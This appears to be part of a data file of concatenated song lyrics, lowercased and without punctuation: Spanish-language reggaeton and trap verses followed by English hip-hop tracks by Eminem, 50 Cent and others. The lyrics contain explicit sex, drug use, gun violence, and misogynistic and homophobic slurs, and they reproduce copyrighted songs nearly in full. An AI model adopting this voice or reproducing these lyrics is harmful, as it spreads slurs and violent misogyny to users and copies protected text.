amor fake, ey ya no estoy pa' ti, ya no estoy pa' ti conmigo ya no tiene' break, ey ya no quiero de tu amor fake, ey ya no estoy pa' ti, ya no estoy pa' ti ahora en toa' las rede' me sigue' sorry, mami, no me hostigue' pero como yo no se consigue tú fuera' mi j.lo, yo tu álex rodrígue' pero, ahora me gusta otra sicaria que vive por bayamón a mí ya no me cachas, yo no soy un pokémon tengo a otra que me brinca hasta que se joda el camón no quiero que me llore', no venga' con el dramón, no que ya no estamo' pa' los tiempo' de la high, ey hace rato que te dije bye gracias por el apoyo, baby, gracia' por los like' yo estoy con cinco cubana' y cuatro hookah en mokai me compré una 
hayabusa y no te vo' a dar una ride en verda' prefiero dárselo a tu mai' contigo no me enfango, no vo' a manchar las off-white si no te gusta, sorry, esa e' la que hay porque ante' yo te quería, pero ya no tú me gustaba', pero ya no yo estaba pa' ti, pero ya no ey, pero ya no, ey, pero ya no ¡acho, bro! a que no le dices que me amas a que no le dices que me llamas que ya debe saber que eres más mía desde ayer así que baby, dime si esta noche nos vemos que seguro lo hacemos y mañana volvemos di-di-dime, si con él eres una santa y conmigo te matas dime si esta noche nos vemo' que seguro lo hacemo' , ymañana volvemo', yeah ouh, dime, si con él eres una santa y conmigo te mata' yeh, yeh, yeh hemos peleado mil vece' como marquez y pacquiao pero la pongo en cuatro y le gano por knock-out en el instagram me tiene bloquea'o total, sabe to' lo que hago, me tiene stalkea'o buscando qué puta en foto' me ha taguea'o una guerra como tom y jerry pero por la' noche' me recibe afeitá' con el splash de cherry zapatos de marca, ya no quiere usar las sperry me chantajea pa' que le compre to' versace o burberry los domingo', condado, pikayo, después ben & jerry's pase lo que pase siempre serás mía aunque chinguemo' de noche y peleémo' to' el día dice que soy un puto y que no confía la beso por el cuello y se desvía austin, baby dime que me quieres aunque sea mentira que yo soy el único que te hace sentir viva conmigo te pones pasiva , con él siempre estás agresiva conmigo no hay discusión cada vez que yo pongo tus piernas pa' arriba y mientras tanto allí en mi habitación y esos deseos que te tengo yo así que, baby, dime si esta noche no' vemo' que seguro lo hacemo' , y mañana volvemo', yeah oh, dime, si con él eres una santa y conmigo te matas dime lo que harás esta noche dame lo que tiene', quiero hacerte to' las pose' , oh un chulito que te maltrate así nadie te lo va a hacer como te lo hago así dime dónde te espero que quiero bañarte to' en caramelo pasarte la lengua de arriba a 
abajo de nuevo tú sabe' que ese cuerpo fue todo mío primero tiene novio, pero le llega cuando quiero dime , si quiere' arreglamos en la cama ay, yo sé que tú también tiene' gana' y aunque yo no estoy aquí, te quiero no fue algo pasajero , pero fui el que te di primero baby, dime , si quiere' arreglamos en la cama ay, yo sé que tú también tiene' gana' y aunque yo no estoy aquí, te quiero no fue algo pasajero , pero fui el que te di primero así que, baby, dime si esta noche nos vemos que seguro lo hacemos y mañana volvemos di-di-dime, si con él eres una santa y conmigo te matas dime si esta noche nos vemos que seguro lo hacemos y mañana volvemos dime, si con él eres una santa y conmigo te matas j balvin tú tienes tu novio , yo tengo las mías recer ya me cela , cosas de la vida tú con él en la cama, pero a mí me mandas mensaje' diciendo que vaya a buscarla, pero yo mantengo de viaje sólo tenemos tiempo pa' sexo y un rato no me hables de amor , que así no me escapo, ouh pone la foto con el novio, le doy like y comentario su novio a mí me bloquea, qué raro, me pasa a diario ladrón que roba ladrón son mil año' de perdón él que no quería saber nada de mí y ella le enseñó mi nueva canción eah, por mi culpa están en pelea, dile que estoy pa' lo que sea tiene la actitud de maduro, pues, quédate con ese burro j balvin, man revol yeh, yeh, yeh, yeh austin, baby bad bunny, baby, bebé la marash hear this music mambo kingz update music dj luian dímelo, revol tiempo de balvin leggo', leggo', leggo', leggo' yeh, yeh okay, ey como phillie estoy prendío' no me apagan ni con extintor soy la obra que no\u2005hace\u2005tu pintor jeter se\u2005retiró ahora el que los mata\u2005e' lindor vamo' pa' lo' estadio' ya rompimo' lo indoor y en\u205fninguno\u205fconfío,\u205facá arriba hace\u205ffrío no me ronquen\u205fcon número' que lo' records son mío' vivo en la casa de papel, tengo mucha pasta, tío tantos hijos que no sé cómo los crío y en los dedos tengo el iceberg que rompió el titanic los 
mato flow sosa y quedan blancos como sammy baby, de to' colore', culito' murakami ahora me doy los shots de tequila en el grammy y eso no fui yo, eso fue la academia el conejo, la verdadera pandemia no hable' mal de mí, cabrón, que eso es blasfemia me mantengo fiel a dio' por eso e' que me premia, ey y estoy picheando, hablamo' horita ¿quiere' llegar acá? dale, ora como rita cabrón, tú no ere' franco, tampoco de vita so, tú y yo no salimo', bo, mejor evita que desde que lebron se fue ya nadie habla de los cavs tom brady, no me hacen falta los pats mi nombre e' grande se escribe con to'as en caps el mvp cabrón, lo dicen los stats y los tengo dando vuelta como la' vieja' en el parque yo no fallo, si quiero escribo con magic marker porque cuando escribo una barra no se borra en p.r. tengo el palabreo, en r.d. la cotorra ustede' son calle, yo soy música vi la lista de los billboard y tu roncaera no hace lógica yo no fuerzo, el flow e' de fábrica bajen pa'l estudio, si quieren yo les doy clínica que si no fuera por mí el género sería tan monótono sin mcgregor en el octágono la baby tuya nunca me habló de ti mientra' quemábamo' y pue' ustede' corriendo pa'l gate y yo haciendo esperar al piloto no te compare', que mi flow e' otro me pegué sin nunca jugar la loto y ahora ando arrebatao' como otto en la uru' por condado, dando ronda' como guagua 'e mantecado' bad bunny e' el diablo, mira hasta dónde ha llegado y to' lo que tengo e' porque cristo me lo ha dado, amén, ey que alce la mano el que esté libre de pecado no creo en suerte por eso no tiro dado' tú criticando y yo creando mi legado, amén ey, ey yo hago lo que me da la gana dime, paciencia jaja ey me acostumbré al sour, ya no patea me llegan a casa, no se capea solo modelos, como barea multiplicar cienes es la tarea yo soy el cacique en tu propia aldea valgo más que todo lo que te rodea no te la crea' recuerda que curry las mete , hasta que lebron lo gardea baja pa' la cuesta que ando con la orquesta, cabrón, no es la 
sexta yo nunca estoy abajo en las apuestas y menos en esta dile a vico que, de la recta final, estamos en el final de la recta el diablo me inyecta y saco la que suena y los acuesta ¡trra, trra! otro que se cae por la fuerza de gravedad ¡trra, trra! otro más, por si sobrevive de casualidad refuta mi tesis cabrón, y te vamos a dar catequésis no he metido un gol y tengo cristianos orándole' a messi tú ronca', cabrón, y tú no vive' así tu jeva se pasa pendiente de mí me llama pa' darle y le digo que sí yo soy un hijo 'e puta desde que nací yeh, yeh, yeh tú ronca', cabrón, y tú no vive' así tu jeva me llama y le digo que sí yo no vo'a cambiar, yo siempre he sido así sigo aquí, sigo, sigo aquí soy un hijo 'e puta desde que nací volví duro pa' meterle al beat ¿pero cómo que volví? yo no entiendo, si yo nunca me fui más duro que el bicho mío jode' conmigo y sale' partí'o tengo un pa'l de hijo', pa'l de sobrino' el que no me dice papi, me dice tío respeten lo' rango', la posición cambié la fama por admiración nunca me quedo sin munición quieren frontear, pero no tienen condición sigo mi vida, vivo cabrón siempre activo en mi maquinón salí solito del callejón y le compré una mansión a mami de un millón tengo la grasa tengo el piquete que mueve la' masa' soy fiel a mi disquera por eso to' el mundo pregunta qué pasa arcángel suena, ey-ey, por más que lo bloqueemo' arcángel llena todo' los concierto' y nosotro' no lo tenemo' yeh, yeh, yeh tú ronca', cabrón, y tú no vive' así tu jeva me llama y le digo que sí yo no vo'a cambiar, yo siempre he sido así yo soy un hijo 'e puta desde que nací tú ronca', cabrón, y tú no vive' así tu jeva se pasa pendiente de mí me llama pa' darle y le digo que sí yo soy un hijo 'e puta desde que nací hoy salimo' de noche con to' los muchacho' puesto' pa' la' insectería' estos cabrone' me roncan de palo' y nosotros dueño' de la ferretería andamo' con to' los rosario' sin saber el avemaría me roncan, me roncan, me roncan, me roncan y están como meek 
mill, sin batería no fallamo' un gancho hoy si meto, me la engancho no' metemo' a tu rancho y en la cara te hacemos un hueco ancho ¿que si soy maleante? cabrón, yo no sé, lo que sé es que los nervio' no existen después de do' percocet hoy no hay excusa', y si se saca, se usa si mi 40 fuera versace, en la cara te hacemos una medusa la noche es confusa y si conmigo te cruza' cabrón, te vamo' a dejar brincando como en el lollapalooza marihuana, la hooka y pastilla' la cubana, que de lejo' brilla hoy te ponemo' en capilla aunque ande' con la familia comiendo en padilla todavía no ha nacido alguien que lo haga como yo si no te pillo en p.r., te pillan los domi' en new york ah-ahmm austin, baby oh, shit bad bunny el conejo malo y yo soy el duende malvado hear this music, o sea, que nos quedó cabrón díselo, luian mambo kingz prra yeh-yeh-yeh-yeh-yeh-yeh bad bunny, baby es una loca me manda vídeos al snap mientras se toca me dice que si hoy le llego, que no puede esperar, yeh que se muere por mí, que quiere to' conmigo que la vaya a buscar, yeh, que la vaya a buscar, yeh es una loca me manda vídeo' al snap mientras se toca me dice que si hoy le llego, que no puede esperar , yeh que se muere por mí, que quiere to' conmigo que la vaya a buscar, yeh, que la vaya a buscar me tira video' por snap pidiéndome que la vaya a buscar que con él siempre termina mal y que conmigo termina mojá' nena no hay otra igual prende fuego la cama te viene' conmigo, no má' me mira cuando está atragantá' sabe', bebé, qué vamo' a hacer lo vamo' a hacer esta noche sabe', bebé, qué vamo' a hacer lo vamo' a hacer, eh, esta noche es una loca me manda vídeos al snap mientras se toca me dice que si hoy le llego, que no puede esperar, yeh que se muere por mí, que quiere to' conmigo que la vaya a buscar, yeh, que la vaya a buscar, yeh es una loca me manda vídeos al snap mientras se toca me dice que si hoy le llego, que no puede esperar, yeh que se muere por mí, que quiere to' conmigo que la vaya a buscar, 
yeh que la vaya a buscar, yeh hoy yo te meto un gol como agüero contigo me voy a cuero, yeh yo sé que ese culo vale dinero pero pa' mí yo lo quiero , yeh, uh es loca con la marihuana y codeína se pone bellaca y se me trepa encima ella tiene todo lo que me domina qué rico chingan las babys en argentina, uh ah, otro como yo no te lo va a hacer otra como tú no vuelve a nacer te rompo el toto y te lo mando a hacer se quita la ropa y se quedó en tacone' le gusta chingar afuera, en los balcone' si se sale, ella misma lo pone en la cama es rebelde, ella no me respeta le pido un beso y me da la combi completa chocha, culo, teta, chocha, culo, teta, yeh-eh se lo hice pa' probar ahora pide pa' llevar no te vaya' a enamorar que yo no sé na' de amar en cuatro una diosa traga y se lo goza toda una golosa la más dura desde buenos aires a mendoza es una loca, yeah me manda vídeo' a snap mientras se toca, yeah me dice que si hoy le llego, que no puede esperar, yeah que se muere por mí, que quiere to' conmigo que la vaya a buscar, yeah, que la vaya a buscar es una loca me manda vídeo' a snap mientras se toca me dice que si hoy le llego, que no puede esperar, yeh que se muere por mí, que quiere to' conmigo que la vaya a buscar, yeh, que la vaya a buscar tomó una pastillita loca y puso la otra mitá' adentro 'e mi boca y yo la toco, y ella me toca no quiere a otro, y no quiero a otra ya ahora es dueña del lugar, va a tumbármelo si me pego atrás, me dice: dámelo me lo sacó 'e la boca pa' fumárselo sabe que ahora lo vamo' a pasar mejor estoy bajo 'e su poder, poder ni yo sé qué tomé, tomé no lo para 'e mover, mover creo que me enamoré, -moré yo no estoy pa' jode', -ode' y tú quieres mover, -over una más de möet, -öet entre líneas, lo sé es una loca, yeah me manda vídeo' a snap mientras se toca, yeah me dice que si hoy le llego, que no puede esperar, yeah que se muere por mí, que quiere to' conmigo que la vaya a buscar, yeah, que la vaya a buscar me dice loca se enloquece si sólo mira y 
no me toca que me pasa a buscar, que no puede aguantar, que lo voy a matar que lo ate a la cama, lo agarre del cuello y no pueda respirar, -ar cazzu, baby tengo un doctorado en esto del sex de dónde salió esa puta, ¿quién es? todos se preguntan si lo hago bien yo les enseñé a todas esas bitches a mover págame, págame, págame, que este culo se lo merece y págame, págame, págame si quieres que esta noche me quede te quiero comer, yeah de saberlo mover, yeah di que te enamoré, yeah y con todos mis truco' hacerte volver, yeah me dice loca, se enloquece si no me toca que me pasa a buscar, que no puede aguantar que lo voy a matar que lo ate a la cama lo agarre del cuello y no pueda respirar, -ar es una loca eh-eh explícale lo que sientes cuando estás desnuda dile que sólo conmigo el corazón desnuda' la cama empieza tendida y quedará desnuda cómo te tiemblan las piernas y cómo el cuerpo te suda explícale lo que sientes cuando estás desnuda dile que sólo conmigo el corazón desnuda' la cama empieza tendida y quedará desnuda cómo te tiemblan las piernas y cómo el cuerpo te suda yo no soy carlos vives pero quiero que te montes en mi bicicleta le damo' la vuelta al planeta dime en qué país quiere' que te lo meta explícale que conmigo te sientes completa que yo sí te hago venir hasta que el totito se te aprieta dile que ya se acabó que mi nombre en tu piel se grabó que ahora tú estás con el bo' que no te alza la vo' periódico de ayer como dijo lavoe dile que fui yo el que entró pa' tu cuarto y te robó , yeh explícale, que te gusta cómo te lo hago ve y cuéntale que conmigo en la movie to' pago que tú no eres mujer de ser infiel pero que te cansaste y no quieres con él explícale lo que sientes cuando estás desnuda dile que sólo conmigo el corazón desnuda' la cama empieza tendida y quedará desnuda cómo te tiemblan las piernas y cómo el cuerpo te suda explícale lo que sientes cuando estás desnuda dile que sólo conmigo el corazón desnuda' la cama empieza tendida y quedará desnuda 
cómo te tiemblan las piernas y cómo el cuerpo te suda y ese momento en que yo , todo te lo hago olvidar y es que conmigo tú sientes como que el tiempo se para dile que mientes cuando estás sin ropa dile lo que te hago sentir, que ya no puedes fingir y que conmigo tú te vuelves loca no lo puede' resistir, se volverá a repetir explícale que, en la cama, lo íntimo no es igual confiésale, que cambiaste tu forma de pensar explícale lo que sientes cuando estás desnuda dile que sólo conmigo el corazón desnuda' la cama empieza tendida y quedará desnuda cómo te tiemblan las piernas y cómo el cuerpo te suda explícale lo que sientes cuando estás desnuda dile que sólo conmigo el corazón desnuda' la cama empieza tendida y quedará desnuda cómo te tiemblan las piernas y cómo el cuerpo te suda yeh, yeh, yeh, yeh bad bunny, baby-bebé-bebé-bebé bad bunny #update yandel hear this music hear this music dj luian mambo kingz, ¡mambo kingz! yandel jajaja trap kingz trap kingz, baby, bebé dímelo, bf "]
em10 = ["50 cent eminem green lantern yeah shady haha 50 cent gggggunit haha here we go again yeah the evil genius green lantern 50 cent does it make you mad when i switch my flow you can't understand how i get my dough 50 cent i'm on fire 'cause shady said so i'm on fire eminem everybody's in a rush to try to get the throne i just get on the track and try to set the tone i ain't tryin' to use nobody as a steppin' stone but don't compare me i'm better off just left alone and i ain't even tryin' to go there with record sales i'm just tryin' to keep it humble and respect myself say what up keep steppin' and just rep d keep my nose clean stay away from weapons jail and livin' reckless but if you go check my belt you may see something else i use to protect myself a vest to stop a rueger and deflect the shells and send 'em back at you faster than they left the barrel and i don't even carry guns no more i don't got to got undercover cops that'll legally pop you and i done seen a lot of people cross the line but this motherfucker ja must have lost his mind that x got him thinkin' he was dmx then he switched to pac now he's tryna be him next so which one are you x luther pac or michael just keep singin' the same song recycled we'd all much rather get along than fight you me and hailie dance to your songs we like you and you don't really wanna step inside no mic booth come on now you know the white boy'll bite you i'll hurt your pride dawg and you know i don't like to but i will if i have to with syllable after syllable i just slap you killin' you faster than you poppin' pill after little pill of them tabs of that shit you on but if you want it you got it you'd bump this shit too if we ain't diss you on it but if we lock horns we can charge harder than busta green lantern we bump heads with any motherfucker that wants to so what's the deal where was all the tough talk when i walked up to you like ja what up dawg how come you didn't say you had a problem then when you was 
standin' there with all your men we coulda solved this then i'm a grown man dawg come holla all you did was slap hands smile and swallow another one of them little x pills in front of me and tell me 50 cent was everything you wanna be come on 50 cent and tony yayo i know you don't want it with me you know you don't want it with me you know you don't want it with me you talk and soon you gon' see you don't wanna bump heads with me i know you don't want it with me you know you don't want it with me you know you don't want it with me you talk and soon you gon' see you don't wanna bump heads with me tony tony yayo you couldn't son me if my father helped you my punchlines is hot my bars will melt you ja you stuart little shells'll lift you every other week i'm buyin' a new pistol i clap at your ass with this chrome 8 and put six thru your hats a seven and 8's irv you ain't suge knight you shook night i'll put my knife in your wind pipe and breeze through the turnpike you know and i know who took your chain you got robbed two times so your ass is lame i'm down to die for this shit all i need is bail you better stick to the movies with steven segal bitch 50 cent and tony yayo i know you don't want it with me you know you don't want it with me you talk and soon you gon' see you don't wanna bump heads with me i know you don't want it with me you know you don't want it with me you talk and soon you gon' see you don't wanna bump heads with me lloyd banks lloyd banks fuck that i'm miles away and these industry niggas startin' to get outta hand like i won't find your whereabouts by stompin' 'em out your man we killin' new york even in compton they understand i'm on the block where you was raised blowin' chocolate up out your van and break it break it break it down they see me pop a boy icy 'cause i could you been gone so long you probably forgot your way around the hood hood 'cause when you paranoid it's hard to make a song how you want it with us if half of your artists got 
makeup on every magazine i open you on your knees takin' prayer pictures and you ain't even got shot yet you scared bitches you don't know nothin' 'bout what pain is sucka i'll put your ass underground like a train conductor muh'fucker 50 cent and tony yayo i know you don't want it with me you know you don't want it with me you know you don't want it with me you talk and soon you gon' see you don't wanna bump heads with me wanna bump heads with me i know you don't want it with me you know you don't want it with me you talk and soon you gon' see you don't wanna bump heads with me wanna bump heads with me tony yayo yeah nigga yeah shady aftermath gunit fuck you think they call us gunit for 'cause we move units huhuh don't think we ain't billin' you for this motherfuckin' studio time matter of fact keep it on 50 we'll call it even ha produced by just blaze 'cause some things just don't change it's better when they stay the same although the whole world knows your name some want a bigger stage they came to see you spit your game whoa but it shouldn't be difficult to explain just why you came back again you hate the fame love the game cold as ice you remain fuck 'em all tell 'em all eat shit here we go again adlibs oh god damn is it that time again already haha okay y'all dont look too happy to see me fuck man dont everybody welcome me back at once all right fuck yall then you can get the dick just call me the ballsack i'm nuts michael vick in this bitch dogfall back you mutts fuck your worms you've never seen such a sick puppy fuck it a sick duck i want my duck sicked mummy and my nuts licked gobble 'em up trick yummy bitch you don't fuckin' think i know that you suck dick dummy you'll get your butt kicked fuck all that love shit honey yeah i laugh when i call you a slut it's funny shorty dance while i diss you to the beat fuck the words you don't listen to 'em anyway yeah struck a nerve sucker motherfucker might as well let my lips pucker like elton john 'cause i'm 
just a mean cocksucker the shit is on 'cause you went and pissed me off now i'm shittin' and pissin' on everybody give a fuck if it's right or wrong so puff the buddha light a bong but take a look at mariah next time i inspire you to write a songcome on oh ohoh ohoh oh i'm as cold as the cold wind blows when it snows and it's twenty below ask me why man i just don't know nonono nono no i'm as cold as the cold wind blows blowblowblows blowblow blows oh ohoh fuck it i'm a loose cannon bruce banner's back in the booth y'all are sittin' ducks i'm the only goose standin' i'll set the world on fire piss on it put it out stick my dick in a circle but i'm not fuckin' around motherfucker i'll show you pussyfootin' i'll kick a bitch in the cunt 'til it makes a queef and sounds like a fuckin' whoopee cushion who the fuck is you pushin' you musta mistook me for some sissy soft punk lookin' for some nookie or bosom go ahead fuckin' hater push me i told you ain't no fuckin' way to shush me call me a faggot 'cause i hate a pussy man the fuck up sissy g's up all you gardeners freeze up put your hoes down shady ease up man chill nah i can't goddamn it rap is a landfill drop the anvil these are shoes that you can't fill shit the day that happens the world will stop spinnin' and michael j fox'll come to a standstill during an earthquake urine in your face 'cause you're fake lightning noise ow what the fuck that hurt wait lightning noise ow what the fuck i just got struck by lightnin' alright then i quit god i give up call it evil that men do lord forgive me for what my pen do this is for your sins i cleanse you and you can repent but i warn you if you continue to hell i'll send you and just then the wind blew and i said oh ohoh ohoh oh i'm as cold as the cold wind blows when it snows and it's twenty below ask me why man i just don't know nonono nono no i'm as cold as the cold wind blows blowblowblows blowblow blows oh ohohoh oh how long will i be this way shady until my dyin' day 
'til i hang up the mic and it's time for me to say so long 'til then i'll drop the fuckin' bombs like i missed the pass when i went long if you don't like it you can kiss my ass in a lint thong now sing along slut this slut that learn the words to the song oh bitches don't like that homie i'll be nicer to women when aquaman drowns and the human torch starts swimmin' man i'm a cold soul i roll so don't compare me to them other bums over there it's like apples to oranges peaches to plums yeah i'm bananas pussy cut off the grapes and grow a pair but i swear you try to diss me i'll slaughter you i put that on everything like everyone does with autotune the last thing you want to do is have me spit out a rhyme and say i was writing this and i thought of you so oh ohoh ohoh oh i'm as cold as the cold wind blows when it snows and it's twenty below ask me why man i just don't know nonono nono no i'm as cold as the cold wind blows blowblowblows blowblow blows oh ohohoh oh i don't know i don't know what caused i don't know what caused me to be this way i don't know i don't know but i'll probably be this way 'til my dyin' day i don't know why i'm so i'm so cold mean things i don't mean to say i guess this is how you made me rbx remember me seven executions remember me i have no remorse remember me i'm highpowered remember me i drop bombs like hiroshima rbx for this one they scream x you retarded 'cause i grab the mic and get down like syndrome hide and roam into the masses without boundaries which qualifies me for the term universal without no rehearsal i leak words that's controversial like i'm not the one you wanna contest see 'cause i'll hit your ass like the train did that bitch that got banned from tv heavyweight getup hit you watch your whole head split up loco is the motion we comin' through hollowtips is the lead the 45 threw sticky fingaz remember me throw ya gunz in the air remember me slam slam remember me nigga bacdafucup remember me chkachkaonyx sticky fingaz 
niggas that take no for an answer get told no yeah i been told no but it was more like no no no life's a bitch met her fuck you if you let her better come better than better to be a competitor this vet is ahead of the shit it's all redder you deader and deader a medic instead of the cheddars and credda settle vendetta with metal beretta from ghetto to ghetto evidence nope never leave a shred of i got the soul of every rapper in me love me or hate me my mom's got raped by the industry and made me i'm the illest nigga ever i told you i get more pussy than them dyke bitches total want beef nigga pbbt you better dead that shit my name should be can'tbelievethatniggasaidthatshit probably sayin' he ain't a killer but i'm killin' myself smoke death fuck bitches raw on the kitchen floor so think what i'ma do to you have done to you got niggas in my hood who'd do that shit for a blunt or two what you wanna do cocksuckers we glock busters 'til the cops cuff us gon' start ruckus and drop blockbusters round the clock hustlers you cannot touch us i'm gettin' wires niggas wantin' me dead wantin' my head you think it could be somethin' i said eminem remember me i just don't give a fuck remember me yeah fuck you too remember me i'm low down and i'm shifty remember me i'm shady eminem dr dre when i go out i'ma go out shootin' i don't mean when i die i mean when i go out to the club stupid i'm tryin' to clean up my fuckin' image so i promised the fuckin' critics i wouldn't say fuckin' for six minutes six minutes slim shady you're on my baby's mom bitch made me an angry blonde so i made me a song killed her and put hailie on i may be wrong i keep thinkin' these crazy thoughts in my cranium but i'm stuck with a crazy mom is she really on as much dope as you say she's on came home and somebody musta broke in the back window and stole two loaded machine guns and both of my trench coats six sick dreams of picnic scenes two kids sixteen with m6's and ten clips each and them shits reach 
through six kids each and slim gets blamed in bill clint's speech to fix these streets fuck that pbbt you faggots can vanish to volcanic ash and reappear in hell with a can of gas and a match aftermath dre grab the gat show 'em where it's at what the fuck you starin' at nigga eminem don't you remember me remember me remember me remember me slim shady hook i'm low down and dirty but not ashamed low down dirty even i'm low down and i'm shifty and if you hear a man that sounds like me smack him and ask him where the fuck did he get his damn raps from i'm low down and dirty but not ashamed low down dirty even i'm low down and i'm shifty and if you hear a man that sounds like me smack him and ask him where the fuck did he get his damn raps from warning this shit's gon' be rated r restricted you see this bullet hole in my neck it's selfinflicted doctor slapped my momma bitch you got a sick kid arrested molested myself and got convicted wearing visors sunglasses and disguises 'cause my split personality is having an identity crisis i'm dr hyde and mr jekyll disrespectful hearing voices in my head while these whispers echo murdermurder redrum brain size of a bread crumb which drug will i end up dead from inebriated 'til my stress is alleviated how in the fuck can eminem and shady be related illiterate illegitimate shit spitter bitch getter hid in the bush like margot kidder jumped out rrrah killed the bitch and did her used to let the babysitter suck my dick when i was littler smoke a blunt while i'm titty fucking bette midler sniper waiting on your roof like the fiddler y'all thought i was gonna rhyme with riddler didn't ya bring your bitch i wanna see if this dick gon' fit in her hook i'm low down and dirty but not ashamed low down dirty even i'm low down and i'm shifty and if you hear a man that sounds like me smack him and ask him where the fuck did he get his damn raps from i'm low down and dirty but not ashamed low down dirty even i'm low down and i'm shifty and if 
you hear a man that sounds like me smack him and ask him where the fuck did he get his damn raps from i lace tunes that's out this world like space moons with a bunch crazed loons dismissin' brains like graze wounds nothing but idiots and misfits dipshits doing whippets passed out like sampler snippets where's the weed i wanna tamper with it i'ma let your grandpa hit it lace it up with cocaine so he can't forget it fuck it maybe i'm a bum but i was put on this earth to make your baby mama cum so what i'm on is way beyond the rum or any alcoholic beverage losing all of my leverage went up inside the first national bank broke and left rich walking biohazard causing wreckage smoked out like eckrich dandruff's making my neck itch what the fuck give me the check bitch you just lost your tip there's a pubic hair in my breakfast got shit popping off like bottle cap tips get your cap peeled like the dead skin of your mama's chapped lips slap dips support domestic violence beat your bitch's ass while your kids stare in silence i'm just joking is dirty dozen really dust smoking if all your shit's missing then probably one of us broke in hook i'm low down and dirty but not ashamed low down dirty even i'm low down and i'm shifty and if you hear a man that sounds like me smack him and ask him where the fuck did he get his damn raps from i'm low down and dirty but not ashamed low down dirty even i'm low down and i'm shifty and if you hear a man that sounds like me smack him and ask him where the fuck did he get his damn raps from my head's ringing like it was spider sense tingling blitzin' like green bay did when they shitted on new england i'm out the game put the second string in this brandy got me swinging bobbing back and forth like a penguin allah allah delinquent choking microphones with broken english make your mama be like whoo this is good who sings this slim shady his tape is dope i dug it it's rugged but he needs to quit talking all that drug shit it was predicted by 
a medic i'd grow to be an addicted diabetic living on liquid triaminic pathetic but i don't think this headache's ever vanishing panicking i think i might have just took too much anacin frozen mannequin posin' stiffer than a statue i think i'm dying god is that you somebody help me before i od on an lp take me to er asap for an iv motherfuck jlb they don't support no hip hop they say that's where it lives the closest they gon' come is pac it's politics it's all a fix set up for these white bluecollared hicks it's to make a dollar off of black music with a subliminal ball of tricks for those who kiss ass and swallow dicks hook i'm low down and dirty but not ashamed low down dirty even i'm low down and i'm shifty and if you hear a man that sounds like me smack him and ask him where the fuck did he get his damn raps from i'm low down and dirty but not ashamed low down dirty even i'm low down and i'm shifty and if you hear a man that sounds like me smack him and ask him where the fuck did he get his damn raps from produced by da brigade eminem yo miccheck my dick testing one two fuck my dick my nuts eminem my attitude is worse than nwa's was i'll battle you over stupid shit and diss people who ain't have shit to do with it like cool j does my tattoo you see me standin' outside of your buildin' screamin' puffy is good but slim shady is for the children i look at my life in a new light fuck it give me two mics i write songs for me fuck what you like you probably hear me rap halfhearted 'cause i don't like rap anyway i'm just tryna get my porno career started oh hell yeah every place and event been there done that shit dre stuck me in a suitcase when he went want a deal study these five chapters lesson throw demos as hard as you can at signed rappers lesson face 'em and diss 'em what up dawg don't give 'em a demo kidnap 'em come on you're comin' with me motherfucker check this out and make 'em come to your basement and listen lesson get a job at a label switch demos with 
canibus and put yours on the owner's table here listen lesson 4 know you heard this before hey let me get your number i'll call you tomorrow for sure don't act like a fan you wanna get signed get the whitest ar you can find pull him aside and rap as wack as you can hey dude come here lesson 5 get a hookup at jive dress up like icp and have them come see you perform live and that's the key but when you see me on the street i ain't givin' you shit bitch don't even bother askin' me toilet water splashes me right in the ass when i'm spittin' 'cause i'm always shittin' when i'm rappin' like master p ungh got a blowjob from paula jones and stuffed it so far in her mouth my balls broke both of her collarbones told mya this shit was all about meah gave alyssa milano syphilis mono and gonorrhea and all three of my main girls said see ya 'cause brandy and monica walked in and caught me fuckin' aaliyah i splishsplash while i'm takin' a bath grab a handful of pills break 'em in half take 'em and laugh white trash fuckin' your wife in the ass while you're out siphonin' gas for your lawn mower to cut the grass eminem so if i hurt your selfesteem and you get dissed too bad yo why you diss me you know i just be sayin' that to get you mad and when i rap about a buncha shit you wished you had a big dick you know i just be sayin' that to get you mad i can't listen to that song that shit's too sad you know i just be sayin' that to get you mad he'll never make it his wrist is slit too bad nurse nurse you know i just be sayin' that to get you mad eminem what a wonderful day i should go outside and play ain't no need to sit inside the house and hibernate hi renée oh hi i was just about to toss a live grenade in your driveway and drive away what are you afraid of a blade made of a razor with aids blood drippin' from it rippin' your stomach like a paper mâché you talk a lot of shit but you was never ill though i'm sick enough to beat you to death with a feather pillow tipped over some cows 
just for a joke and a laugh jumped up choked a giraffe snapped his neck and broke it in half wagin' wars went on stage and sprayed cage with agent orange and wiped my ass with his page in source here the demon is here i'm steamin' this year i rip voice box out and scream in his ear it's not a gimmick bitch it's an image i live it give a fuck i don't know what a fuck is to give it yeah i don't think this guy is well i'm high as hell i'll beat you with a live cat when i'm swingin' him by his tail i'll fuckin' i'll fuckin' lay your nuts on the dresser just your nutsack by itself and bang them shits with a spiked bat cut your neck off then sew your head right back and leave you like that you just triggered a prick who just mixed liquor who's itchin' to leave you disfigured and stiffer than christopher reeves i was dealing with strep throat while your mother was breastfeeding and gave her the flesheating disease i'm iller than takin' a hammer and beating your knees and walkin' through south central la bleeding in jeans am i a blood or a crip wakin' up the next day in breathing machines flashin' back to bein' shot and repeating the scenes on how you just got smoked and if you do live you'll be too scared to tell it like a biggie and pac joke eminem so if i hurt your selfesteem and you get dissed too bad you know i just be sayin' that to get you mad and when i rap about a buncha shit you wished you had you know i just be sayin' that to get you mad i can't listen to that song that shit's too sad you know i just be sayin' that to get you mad he'll never make it his wrist is slit too bad you know i just be sayin' that to get you mad eminem sway i know that makes you real mad don't it uhhuh that's right slim shady yup sway and tech sprayin' wreck bitch and we don't give a heck uhuh or a damn or a fuck or a shit so suck my mothafuckin' dick the wake up show let me tell you what it mean to me it mean hard beats hard rhymes bboys hiphop baby all the way forever shook ones pt ii 
time's up insane in the brain 8 mile sweet home alabama juicy gotta get mine gang stories this is how we do it feel me flow players ball get money i'll be there for you shimmy shimmy ya bring the pain lose yourself cream next level nyte tyme mix temptations player's anthem lose yourself tony yayo 50 cent shady yeah 50 cent who run it you know you actin' like you don't know we run it yeah you know but you actin' like you don't know who run it you know you actin' like you don't know we run it yeah you know but you actin' like you don't know you know you actin' like you don't know i tear the club up fo' sho' this flow is gon' bring mo' dough yeah you know but you actin' like you don't know 50 cent now homie i say i run it run it 'cause i'm in control hpnotiq hennessy a couple shots of patrón i have you feelin' a'ight i get you high as a kite party poppin' shawty says she comin' with me tonight i ain't shoulder leanin' i ain't snappin' and poppin' either i'm bobbin' my head or i'm just standin' there watchin' i'm a hustler i hustle you can tell that i'm paid and i protect what i got i'm in the house with my blade nigga you front you gon' get it okay now maybe i've said it 'cause i want you to tridip yeah i be on that shidit you should see when i'm stuntin' i flash the stones to be wantin' push the whip see me rollin' you can tell that i'm holdin' i'm just doin' my thang you know the unit's the gang i got my grimy shady with me you front you'll have to get me off yo' ass i pay the lawsuit and laugh haha 